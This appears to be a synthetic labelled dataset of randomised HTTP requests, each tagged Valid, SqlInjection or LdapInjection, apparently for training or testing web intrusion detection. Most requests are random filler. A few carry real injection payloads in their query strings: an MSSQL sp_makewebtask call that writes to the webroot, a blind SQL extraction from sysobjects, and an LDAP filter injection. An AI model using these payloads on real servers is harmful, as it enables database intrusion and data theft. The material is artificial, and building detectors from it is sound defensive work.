GET /5kitoS39tsc2t4t/cltrr/0deOsfEt/euau7/eo2ivrftnrmriEi/09R0binIWK8/0-kLtQmORR-PbfqFEE3H/duiuAor/tegwdPSRyQLsf/hwckhnt78helf/eDUP0I-cJTR/iNi.jpeg?lloa=wad7u5&sn1hnxndtnt9ut=ztyHO0Nm&Tdok=%26ehharimmbate&disee=4O_Aaq&9keipL4ubnsils=4l&itt9ekwNeenlink=m%5D8sN+oaoyks%2F&etiheIsange=593062657&7QhtaccesNQ7B8vdg-=m8+from&W9wxK0M5mK=vn6ne77aehdh&aseiaUlnh=6886226284&sniltneoLvieexa=dsodcdqif&xleas=e0DUSm17dI&Hst2d1JtclnEsw=dxafet%26hcaoeW0mh+e&idmte07hsEmcnEY=OeyOxp_uefrom3gz+ HTTP/1.0
Host: 244.241.94.95
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ptdwtebi-Erib, aTk-semwl
Cache-Control: nrw='wihe'
Client-ip: 214.229.176.133
Cookie: _dbody4X5=ltIx2ilsai;FylJmtQR=tr
Cookie2: $Version="45"
Date: Sat, 26 Aug 06 08:27:19 UTC
ETag: "8sKNg1mC8SYEFTZU@"
Expect: 100-continue
From: hatG00@iVFLben.net
If-Modified-Since: Sat, 16 Jan 10 21:27:40 CET
If-Unmodified-Since: Wed, 11 Jun 08 19:23:33 GMT
If-Match: "F9Q8_FMgaDU_j@lCLt2"
If-None-Match: "ZD-tn72Vk_tYmhY5XASm"
If-Range: "F5NSpEx_O4omEK7"
Max-Forwards: 3471
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: piAH torj=he2hc8t
Authorization: NTLM dHRwYjBneXNzbEF1dHN0UHlpY2NFbnJpeW5yQ2ZpdGhv
Range: -4
Referer: http://www.aeot.net/pnomou.sh
TE: deflate
Trailer: If-Range
User-Agent: isuyy9nr5m
UA-CPU: PowerPC
UA-Disp: 2553,984,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 944x565
Via: 7.1 www.ueingzi.tiff:32, 5.7 27.44.13.117
Transfer-Encoding: ne4i; ep2aho=Ytseal8t
Upgrade: Eoyt/0.3, nnd/2.9, V3f/5.4, ceegk/2.2, AoseO/0.6
Warning: 010 www.dhr6yno.shtml "sdut2s" 
X-Forwarded-For: 253.181.198.179
X-Serial-Number: 4041973045614
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 29180
Start - Id: 28186
class: Valid
GET /20Uo9WWMj02L2F/uTF3vgQs6uk_T4tC1v/rOx.Uu9I-3W/rAzA6SEKCdV33.k/o2XHf9Q9_BgpGR.jpg?EYV336z9dY=o%27oimglgI&aylty=or%3An%3C5eRiate+waibgsoundp&meeutywgr7alr=4&nsez12h=eeXef9sSr0&PbvD3mwacceptiframe=2QDcyf&Ienqgr=drop%2Byiena&dwctotr=fndlnrsi&nacajqeart8h=tss&LjwH=O%7C%2Fg&4l=t&6fOoCinput8z=984771&totloeigeln=wpNhmlYe HTTP/1.1
Host: 198.166.96.122
Connection: close
Accept: audio/*;q=0.6, image/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 23.218.78.181
Cookie: taebiqq0eqf10e=r7vb1F6btvM8;9h=656;an6t1nette=escernclttnjaWaX;sUd0diiiEo9=frlink7t;Eeoi=17568
Cookie2: $Version="0"
Date: Thu, 07 Jan 10 05:12:31 CET
ETag: "eutI8MAMAXW4D@Xam"
Expect: SeeDtoat
From: haidri@m6zcet8gA.ch
If-Modified-Since: Thu, 02 Dec 04 17:45:01 GMT
If-Unmodified-Since: Thu, 18 Jun 09 07:20:43 GMT
If-Match: *
If-None-Match: "K7CquwpkRDX_x.p"
If-Range: Tue, 22 Apr 08 13:00:34 GMT
Max-Forwards: 211
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: eeUu aeelgh=vs3ems
Range: -569,-376,5-
Referer: /ciHd/ntotl/aslpir/yali/n7Eo.sh
TE: deflate;q=0.1,trailers,deflate;q=0.3
Trailer: If-None-Match
User-Agent: w3nepOnin/8.4.7.6.7
UA-CPU: MIPS
UA-Disp: 3034,654,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 709x9320
Via: hxb/8.3 www.oyeek9dm.html:48408, 4.2 189.209.2.83
Transfer-Encoding: deflate
Upgrade: sse7/8.3, nhtR8u/1.0, lwewrt/4.6, hgvtE/7.5
Warning: 941 204.125.32.112 "Rsze" 
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 3105222216298089545
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28186
Start - Id: 12699
class: Valid
GET /g2xmhA/lJ5CzoAS/iTFcEh84gGS/rvkoBQ/ixdyib/ebgF9/s7iosatlsrlitne3et/oatMlncssss98/gyLI.jpeg?eydhti=nh9o HTTP/1.1
Host: 142.166.113.191:79983
Connection: keep-alive
Accept: text/*, image/*;q=0.6, audio/basic
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 141.142.203.127
Cookie: jo1Ee1s=blga3kYz4aO;nyThoh=mraoru;thi=ruShc;AyqxuO=4nrlhnmchk;loiepeeDae=eMrmuozasryi;tytnd=513995066
Cookie2: $Version="994"
Date: Fri, 02 Mar 07 10:48:37 GMT
ETag: "nqAAltaC5qFMUOnweP-h"
Expect: 100-continue
From: aIsia@oetle.org
If-Modified-Since: Sun, 08 Nov 09 01:56:34 GMT
If-Unmodified-Since: Tue, 24 Aug 04 22:32:21 UTC
If-Match: *
If-None-Match: "BZIF.ZivsnqJBPrO"
If-Range: Sun, 20 Jul 08 02:11:27 CET
Max-Forwards: 870
MIME-Version: 5.1
Pragma: c=ra
Proxy-Authorization: NTLM Z2huZTZwcmlldG84d2Vpc2VhZDNpZ25lZmhmZWVlbHRlZGxhOGFn
Authorization: onOl dlt7ot=nrlid
Range: 663086-5
Referer: http://o6leT.ch/tmem0/souiel/conaein.mpg
TE: deflate,gzip
Trailer: If-Match
User-Agent: sdrsrr6Ta (584fnxfm-; iq0BRj; 4cV92PdSl; eXbIMUID6)
UA-CPU: Sparc
UA-Disp: 753,2579,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 072x109
Via: pad/3.3 61.87.216.217, 9.6 www.eEozirue.png:34018, FTP/7.7 www.sidso.png
Transfer-Encoding: deflate
Upgrade: hlvieb/6.1, ea8O/4.9, dmeXre/8.7, htt5c/9.5
Warning: 566 www.iaages.png "ihfood" "Thu, 27 Jan 05 04:38:01 CET"
X-Forwarded-For: 16.208.183.253
X-Serial-Number: 91220427481224
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12699
Start - Id: 38309
class: LdapInjection
GET /XWgY9@IDCjQ0aW/2welog1T.gif?QiUydocumentV=otsTatt4a&dntseew=%27iwfftp%25eun+%5BMm+l2s&iycoabtislOh=varefap&szaroou7ggerst=4%28&QpssX-zimg10aDU=3877816808&ttmyhcNrE=do%29%28+++%7C+++%28run%3D*%29&Oaorg=iAdfeos++%5Dr%3A%3Apem HTTP/1.0
Host: www.nzbee.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 2.55.18.28
Cookie: cayeeeauEh=daxs;rsnrnsa0Lhnps9=siearsboolmteFgbp;olsde9Psiel=eOTT_Y
Cookie2: $Version="14"
Date: Sat, 20 Aug 05 03:34:21 UTC
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: k3ilm
From: ctbt@euirsarao.st
If-Modified-Since: Thu, 29 Jun 06 02:16:43 CET
If-Unmodified-Since: Sat, 14 Jun 08 15:59:27 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Oct 08 16:00:50 CET
Max-Forwards: 44
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Digest nc=D8AF1d4F
Range: 529307-,-0
Referer: /Neo2f/ndEthea3.cfm
TE: deflate;q=0.4,trailers
Trailer: Pragma
User-Agent: Mozilla/6.5 (Machintosh; U; PPC Mac OS X 7.5; la-ne; rv:3.5.2) Gecko/59687595
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: HTTP/4.5 138.49.2.137, FTP/8.3 www.gyhsieir.shtml, 1.1 239.183.221.127
Transfer-Encoding: compress
Upgrade: d7t/5.9, eblyng/3.2, 5nhqs/0.7
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38309
Start - Id: 35051
class: SqlInjection
GET /tsylsnPiehratooeDha/teno6shitnr/nl.yW-aqz2OHw@/coAtdfirasapanr10e/gyiigireol9s6ori.dll?3qbdii3twrp1se=%27%3B+++++EXEC++master.dbo.sp_makewebtask+++++%27c%3A%5Cinetpub%5Cwwwroot%5CEIS8.jpeg%27%2C+%27SELECT++++d42soeyi+++++FROM+4Hs8tt9y+WHERE+++xtype%3D%27%27U%27%27%27&hS4rrkgxdd8=nQ.86UI&sE1wHsr=93408822&ia8ilevrcqA=63616&fromEychttpsHoosH-J=itt3tndtp&smochae8nl=5671784&fe7u=%26tt%5D&hEosncq6wer=taxifcnnKtbseesd8&u07tneGyNFtihd=80861226 HTTP/1.0
Host: 104.29.237.230:80
Connection: close
Accept: video/*;q=0.0
Accept-Charset: windows-1251, koi8, iso-8859-9;q=0.1, shift_jis
Accept-Encoding: 
Accept-Language: r0p-la, ysai6dth-fnarrr, e0tr-uqi, d-u;q=0.8, aehiie-o1aawe3
Cache-Control: only-if-cached
Client-ip: 175.67.198.190
Cookie: EvLMMHU=l]sf;;imNriiwhesotdh= -;eao=cpinsertecho4;hYmNnata7oidbg= perl/c;homhYohi3r=aotAeijeseso;9ljb7=:
Cookie2: $Version="16"
Date: Fri, 18 Feb 05 04:25:06 GMT
ETag: W/"-@toPA2_pmCBW6QQ"
Expect: 100-continue
If-Modified-Since: Tue, 18 Jul 06 01:34:39 GMT
If-Unmodified-Since: Thu, 19 Nov 09 13:24:35 UTC
If-Match: "pUjS_lArrwn2E@y8-"
If-None-Match: "WkeUE2OF866syH9gqE"
If-Range: "@x4hYxC9ukkoLTw-k"
Max-Forwards: 43
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic dDlhaW46dXFjcA==
Authorization: Basic ZGZvaTphZW5lbg==
Range: -72038,553140-1
Referer: http://www.pz8y5i.ch/metso/5niiru/9aectasl/h7ohim/e3e7AeS.jpeg
TE: trailers,gzip;q=0.0,deflate
User-Agent: Mozilla/1.4 (X11; U; Linux i386 2.3; al-dr; rv:8.9.4) Gecko/13157582
UA-CPU: StrongARM
UA-Color: color16
Via: 4.5 www.2Ortemrn.css
Transfer-Encoding: compress
Upgrade: l5i/1.7, lDqw/9.3, ade/1.3, rst/9.9
Warning: 100 www.saeeiu.png "ehgteoiulnle" "Tue, 31 May 05 03:38:13 GMT"
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35051
Start - Id: 26288
class: Valid
GET /4vzyV3u8Vkl/LeaqneerAsiattr/hSd/e5nlpU5rji/dk/TgeYnt/x4tudrseettTeoeeo/lr/RI2w_Ot/pg@nTw0IdVkBdcb.D1d.jsp?inideuw0ahewia=1022&asOUiselhiahri=7egxcp&mnou2tl2slp=ilo&snatso=3orsf HTTP/1.1
Host: 58.134.48.241
Connection: close
Accept: application/x-tar, image/png, video/mpeg;q=0.6
Accept-Charset: isiri-3342;q=0.4, shift_jis;q=0.7, windows-1254, big5, hz-gb-2312;q=0.6
Accept-Encoding: compress;q=0.9, gzip;q=0.0
Accept-Language: *
Cache-Control: min-fresh=74542
Client-ip: 170.49.0.180
Cookie: et=19
Cookie2: $Version="1"
Date: Wed, 23 Feb 05 08:59:08 CET
ETag: "ojgfbOjMyIE16F_FkE1X"
Expect: aali=uePuhs6;rsBegfeu=tapippI2
From: Htoian@ttglhxafws.fr
If-Modified-Since: Sun, 01 Mar 09 09:24:37 CET
If-Unmodified-Since: Fri, 03 Oct 08 02:56:42 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 28 Jul 08 24:01:12 UTC
Max-Forwards: 6052
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="dnqaohe"
Authorization: NTLM YWt0a09yZGFtb2xlbHNFb0U5dHRwOG5lbWlMb2xhb24=
Range: 338-840605
Referer: http://kee2Yu.org/ivIo.pdf
TE: deflate;q=0.8,deflate;q=0.3,gzip
Trailer: Date
User-Agent: Mozilla/2.4 (X11; U; Open BSD i586 9.5; me-n0; rv:8.8.8) Gecko/12059124
UA-CPU: MIPS
UA-Disp: 509,4481,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3902x9522
Via: 4.2 61.82.4.57
Transfer-Encoding: compress
Upgrade: liya/7.1, bae/3.3, ava/0.7, 6we6/3.5
Warning: 536 230.80.52.166 "enysnbtmlEweDe" "Sun, 28 Sep 08 15:57:41 GMT"
X-Forwarded-For: 212.21.79.197
X-Serial-Number: 93545623104
----: ----------
~~~~~: ~~~~~~~~~~

null

End - Id: 26288
Start - Id: 8845
class: Valid
GET /Rjwm7ilG/hzLd/8gSu5al/eaeElahkq/Lsm/mYBfToJqZgiwL3w/2FdUaj/Srdf/nkczX/7eNwgm7o.html? HTTP/1.1
Host: 55.216.133.48
Connection: hhno
Accept: application/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 172.255.16.6
Cookie: lirleyya1a=jntsb;rsna=xEt nae[T nwqa;KvncC-qs=839849;mo8ynte=yUnsohRnitieaeewo;yrS8nu7968z=asimseraRzpliaw3e;dn0dssxvh6=c;tmpt-
Cookie2: $Version="67"
Date: Fri, 03 Feb 06 09:13:56 CET
ETag: W/"95MocJfVdQq6DGH"
Expect: 100-continue
From: uq6Ima@5ccuIm.net
If-Modified-Since: Thu, 23 Apr 09 09:22:14 UTC
If-Unmodified-Since: Sat, 13 Sep 08 16:50:53 GMT
If-Match: ".yJlnmUiEz4nUPtF"
If-None-Match: "S65JCG-9SvA01JX9P"
If-Range: Mon, 14 Feb 05 10:46:49 GMT
Max-Forwards: 9
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: talo ncd7uini=a2NreaE
Range: 01-5579,5729-
Referer: http://iatnoso.com/dmfr/Ustg/rToorAi/ahaxyuii.htm
TE: gzip;q=0.1
Trailer: Max-Forwards
User-Agent: Mozilla/5.8 (X11; U; Solaris 0.7; 3e-aw; rv:7.8.8) Gecko/36920010
UA-CPU: x86
UA-Disp: 344,093,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 186x0429
Via: fiyrgo/4.6 www.wyne.htm:04556
Transfer-Encoding: tNxih
Upgrade: ocwua/7.0, sAmh/4.1
Warning: 629 51.114.84.67 "oerorR" 
X-Forwarded-For: 160.159.126.87
X-Serial-Number: 56388963279118
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8845
Start - Id: 31656
class: Valid
GET /hQ.zlTw/ifyEki0zTJfh15Ohn/dIoEnt/Fscen0itorwsey2ocsGo/yQ9MQcatlsQOL/exgg64jSlocN-.shtml?Go1HVdg3gL=caa0ehc%3Ce&9zwebtgcthurBh=betexaaw3o9wmos&netb=470&3m3xitblgesr6io=iSraot&Oz0dlog7QRrvuHa=4&YFoJconnect7ZykZ7=o%3Frrwqettl%24as&eVgfitoc=DEsZ3onr&6tdd=i&tI=nte2+sperl&DHMwp-aELK7Rp=918&ff2NGJwindow.openvGhxm=fedv HTTP/1.1
Host: 60.208.80.156
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=467
Client-ip: 47.57.123.190
Cookie: g01iennwjm=wn  ;p7nypj=58043376;oAet8eomn=in;Oho=a:arc;Eodoudyanheot=oqe 1wexeceqs1nhba
Cookie2: $Version="04"
Date: Wed, 25 Apr 07 17:25:41 CET
ETag: "u9R.S24VRKT4-Wy"
Expect: 100-continue
From: fCrLwe@tcabt.ch
If-Modified-Since: Wed, 29 Aug 07 24:35:24 UTC
If-Unmodified-Since: Thu, 21 May 09 02:00:10 UTC
If-Match: "M0-@CRomeOpab3f"
If-None-Match: "z11ivkLjgsBZQWBT"
If-Range: "T52Y-Zg7t6VUqGkFBjFJ"
Max-Forwards: 56
MIME-Version: 6.6
Pragma: F=tc
Proxy-Authorization: Digest cnonce="wn5we"
Authorization: Digest uri=/lehugf/tseaebnY/aarneko/Hvru9e/tnoLn5a.wmn
Range: 444-
Referer: http://jf714e5.be/ln7so/ttaii/sderip.php3
TE: gzip,chunked,trailers
Trailer: Warning
User-Agent: 4encsCreta
UA-CPU: 68000
UA-Disp: 0279,131,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8191x528
Via: FTP/7.6 131.82.79.163, albrg/0.0 180.102.74.180
Transfer-Encoding: deflate
Upgrade: noyiNn/8.3, tMu5aT/7.1, acs/5.6
Warning: 847 245.165.104.253:38182 "wolt9DaseP" 
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 049800080
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 31656
Start - Id: 4638
class: Valid
POST /fZoSGz@uR8y9Hu4E5E8v/Y1g/a7WnEgmVDe/euHUcI8TZAJ@Ls6O4/76araaitlhwnMeah/bgsoundsZgalln8P/Leshtbisesh/itrtI.msf? HTTP/1.1
Content-Length: 56
Content-Language: noajiRrl,fedknrtm,aretls
Content-Encoding: gzip
Content-Location: /aAgd/2an6Es/tniNqtGf.php3
Content-MD5: YXRpZWVwMjQxaDBpZm9pMg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Jul 07 11:44:26 CET
Last-Modified: Fri, 02 Apr 10 02:56:00 CET
Host: 222.156.108.67
Connection: close
Accept: image/gif;q=0.2
Accept-Charset: cp-950, x-mac-japanese;q=0.9, koi8;q=0.7, cp-932;q=0.2, windows-1255;q=0.6
Accept-Encoding: 
Accept-Language: teiG-t;q=0.5
Cache-Control: no-cache
Client-ip: 190.131.207.158
Cookie: ljdoh='trgo;i_4J3k=EeetNs
Cookie2: $Version="4"
Date: Tue, 10 Mar 09 15:53:08 CET
ETag: "KfJfN2.vJtVDGzm"
Expect: rosn5
From: ru5af5o@nFeb.it
If-Modified-Since: Tue, 06 Apr 04 17:32:06 GMT
If-Unmodified-Since: Fri, 12 Sep 08 15:00:40 CET
If-Match: *
If-None-Match: "fwKcCNp5U.mrXs5VKl1"
If-Range: "T57WEuKPaJdmjIqBWzCk"
Max-Forwards: 0
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="vsltae"
Authorization: Digest realm
Range: 232-0,-44178
Referer: http://o6E3s.com/orkd3qd/smergdne/q507crIr/axem1n/srpd.bin
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: sA6om0l/7.1.2
UA-CPU: 68000
UA-Disp: 984,729,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0964x700
Via: HTTP/9.9 www.btmeKauN.htm, HTTP/6.4 www.zanpe.shtml
Transfer-Encoding: deflate
Upgrade: dea/8.9
Warning: 256 www.p3oc7si.html "erzAiotceQ" "Fri, 17 Jul 09 03:33:05 UTC"
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 94988
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5wS12u=7181&sk9nssndca4=474&eoR2uiadc5seit=w8'nwaxy ie

End - Id: 4638
Start - Id: 35409
class: SqlInjection
GET /ybc0N697c/ide.php4?31f=13627971&Kexecv6NMPFnZ=riPtePt2&enirN=eK8pPQtP9.3&gyennblteng=97528&U1BKNNP=a4e8access_log%27yesystemme+&nhcyshlsA0Xeod=AND+++++ascii%28lower%28substring%28%28SELECT+++TOP++++1++tls7sb+++++FROM+++sysobject++++WHERE++++xtype+++%3D++%27U%27%29%2C1%2C1%29%29%29++++%3E++++111 HTTP/1.0
Host: 209.247.55.194:51431
Connection: close
Accept: video/mpeg;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 67.105.71.5
Cookie: pttenn=8
Cookie2: $Version="1"
Date: Mon, 17 Oct 05 10:55:01 GMT
ETag: W/"Tt-n2t9gA2mK-4fFk"
Expect: 100-continue
From: meCo6@c0Onn.it
If-Modified-Since: Sat, 04 Mar 06 08:57:18 UTC
If-Unmodified-Since: Thu, 28 Dec 06 10:57:58 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 16 Jul 06 20:09:30 CET
Max-Forwards: 394
MIME-Version: 4.3
Pragma: toiumBfi='f2i'
Proxy-Authorization: Basic YXdpZHY6dzV0cHNoZnI=
Authorization: NTLM b05ob241ZHRldWllYWVuM1RlZHJyNXJxdHU3VHNicmpuaHdUbG5paW5ydWxyM2k=
Range: -67
Referer: http://6aaTeth.fr/atiaivr/naxl/5sudtin/thmrtlA.js
TE: gzip
Trailer: Upgrade
User-Agent: osb7miir/4.7.3.9
UA-CPU: 68000
UA-Disp: 678,1314,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: 1.0 www.lbur.html, e5soa2/7.9 www.fo4k2w.htm
Transfer-Encoding: gzip
Upgrade: cd4ali/2.0, 7coFhe/3.3, gftEc/8.2, AtJar/5.6, t7rii/7.9
Warning: 292 225.163.120.85 "z0feceldn" "Sat, 14 Oct 06 01:35:25 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 840148
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 35409
Start - Id: 4673
class: Valid
PUT /xgsrea/nYfb5h/oorn_TlXkqwJ/1z/iszweta2qyee/n5eBhys/2oOstggscehEseN/lq/wzhrGJ6dPmCdXNY2f5/nF6fAZu/Kp/OTFq.exe? HTTP/1.0
Content-Length: 71
Content-Language: ses,ts
Content-Encoding: identity
Content-Location: http://tauipaxi.gov/pcs86/awer/bms7o/eNjaiE.php
Content-MD5: aGRvZXB3eXM0ZW0wYXc5Sw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Aug 06 07:05:44 CET
Last-Modified: Sun, 04 Apr 10 05:32:44 GMT
Host: www.aseca9x.st
Connection: ikllsxeh
Accept: video/quicktime
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: eais-sp4;q=0.2, r9-ateadm;q=0.2
Cache-Control: luca='ligou'
Client-ip: 138.205.233.134
Cookie: fiesraf=2]t;rDlcdayuhnqUya=c74tqAlTTrB;0ety5=+w1;4pe5=18623538
Cookie2: $Version="2"
Date: Thu, 19 Aug 04 09:09:21 UTC
ETag: W/"GNMzKzyE2ZglxXAupYRN"
Expect: 100-continue
From: es6emnTp@6gdtmKmk.uk
If-Modified-Since: Thu, 22 Dec 05 13:10:18 GMT
If-Unmodified-Since: Mon, 12 Nov 07 04:00:32 CET
If-Match: *
If-None-Match: "fkPtnj93x6lmaET"
If-Range: Wed, 05 Apr 06 08:12:15 CET
Max-Forwards: 9338
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: hldtn eieme=dloheAoy
Authorization: Basic MG5udDpvc3RjOHVldQ==
Range: 511-,489649-576168,-523
Referer: /olmbc/nvwjhirq.avi
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/7.1 (Windows; U; Win 9x 3.8; ha-ts; rv:0.4.5) Gecko/15451358
UA-CPU: 68000
UA-Disp: 860,425,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 111x089
Via: 2.0 0.41.4.21, 2.8 www.ezeh.jpg
Transfer-Encoding: compress
Upgrade: cdZ/6.2, tOo2/2.7, neA/5.6, es0/1.8
Warning: 238 148.230.14.82 "4rrh4aee0nl" "Tue, 25 Jan 05 05:33:08 GMT"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 2125001
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

qhSiItopnt8hh=995504&7jbi=ruuARRI8&nie=td&elfw1t=nmrltbetweenqroftndetc

End - Id: 4673
Start - Id: 3429
class: Valid
GET /a6a/nnbklsdjeooo/mncycReecl/rKgc1NTL6b9gmO/4logioWxtermI9CDah/ohrbT.exe?tbea0eyn=hqH6tnnn%24%3D&idoq=fRAWwuQoraekeaaOt&iiearttaStztaS6=7445&i62n=piam5H%25ohk+fuw&pbapfxlo6aaT4nm=e%3Ca&hsf=4Ugndgk%40&rcUiOrnsihef=isPrkH&oMsnasrm=57359420&hShlIhshR=b%7Cemcliqsnos&IrnaIea=ftp7u%3Akaoe%25r&e75typun=74796&stse=331&q-Ggmnodeme-=737&oSeWAe3rdcsp=8sepsehoycj5r HTTP/1.1
Host: www.ndyg2gmi.cz
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-greek
Accept-Encoding: gzip;q=0.5, identity, gzip;q=0.6, deflate;q=0.1, compress
Accept-Language: ptonmatr-Lti, 9r-nnIpdp;q=0.6, Prr8peo-v;q=0.7
Cache-Control: iao='l'
Client-ip: 73.145.111.116
Cookie: jtandqrc9=eenetcat(;2MQZ_I=0901213;lb1k=5452417;0a2ttw3.=59685497
Cookie2: $Version="748"
Date: Thu, 17 Nov 05 15:23:29 CET
ETag: W/"-ux1L@tJgN0cXsjizl_"
Expect: sstme=eTehehs;lsJr=etacnI
From: otEj@3satd.de
If-Modified-Since: Tue, 04 May 04 05:12:47 CET
If-Unmodified-Since: Mon, 31 Aug 09 24:54:14 GMT
If-Match: "i4piovc2Bj8ES3w"
If-None-Match: "AQwBI5oPWToHhDGB."
If-Range: Thu, 15 Apr 04 08:18:14 UTC
Max-Forwards: 8272
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest response="FE0E6b5BFFCfDCda4e93Ab8BFb700c11"
Authorization: Digest nonce
Range: -79,44302-,67-20461
Referer: /se2S5ye/nNnsxlpe/art7t3/REndUoc.php3
TE: trailers
Trailer: Date
User-Agent: gnt8es/3.8.2.2.3
UA-CPU: MIPS
UA-Disp: 627,2976,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 969x7653
Via: HTTP/5.8 www.Lo5eRl.jpg, HTTP/6.5 www.shIhenir.css, 8.5 203.149.62.120
Transfer-Encoding: 3drgte; dbha=vg0rynr
Upgrade: rdse/9.1, lomd/5.7
Warning: 682 122.84.45.120 "hiq8gwIlahfmhHa" 
X-Forwarded-For: 60.74.245.251
X-Serial-Number: 80963840971
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3429
Start - Id: 6416
class: Valid
POST /85pECU1c-lOchildg/nP6Y0iniwuPR5e/nrleotittjgcrSNkesi8/esbwt/nbsEI6lS9u0DbSN/mtLuYAxTnN2r/29pFGbodyiframe/0@_pOUKJM/R7US3nrSR9.gif? HTTP/1.1
Content-Length: 108
Content-Language: aeeouys
Content-Encoding: gzip
Content-Location: http://www.munre3fi.st/Drtw.mspx
Content-MD5: dklwZXNsbHlmc2E2bm1ucg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Oct 09 12:58:31 GMT
Last-Modified: Fri, 24 Oct 08 05:42:11 UTC
Host: 9.142.79.174
Connection: raekcs
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: identity, gzip, compress;q=0.5, gzip
Accept-Language: *
Cache-Control: max-age=395
Client-ip: 230.23.207.129
Cookie: omradSsnnto=9d;8ywVqsenm=8;5Y6IhDLq=j;zcmvhLkedrget=etdeahitui0tbo;1hEat7p=tS6EOMqcqGP
Cookie2: $Version="208"
Date: Sat, 17 Jul 04 15:20:17 GMT
ETag: W/"P3-rZcBNXRhEwdWycS"
Expect: 100-continue
From: HoT3na@olidl5enhc.net
If-Modified-Since: Sat, 30 Oct 04 08:34:28 CET
If-Unmodified-Since: Tue, 08 Aug 06 11:29:14 UTC
If-Match: "D28wmCXUXS4MfJ7"
If-None-Match: "MmQ@nYRjCsDiTfjyjK"
If-Range: "k1gqcW43vtn@rGdyd"
Max-Forwards: 841
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic ZmsxYW5sWWU6ZG94SWxiZXQ=
Authorization: Basic YnRvcjptbG50eQ==
Range: -46641,596587-2635,975-1
Referer: /uyEpC76e.jsp
TE: chunked,deflate;q=0.8
Trailer: If-Modified-Since
User-Agent: reWj4nP0 http://www.ueeei.biz
UA-CPU: Sparc
UA-Disp: 1399,3420,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8664x6526
Via: 1.5 38.119.157.5:374, 9.3 www.rtUhmzmt.css:906, 4.7 www.lesMe.shtml
Transfer-Encoding: deflate
Upgrade: ono/3.8, nsbim/3.9, sx9l/5.2, i6neu6/4.3
Warning: 649 www.skQrees.jpg "enbei" "Thu, 02 Mar 06 03:53:47 GMT"
X-Forwarded-For: 3.49.116.125
X-Serial-Number: 45754151629
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

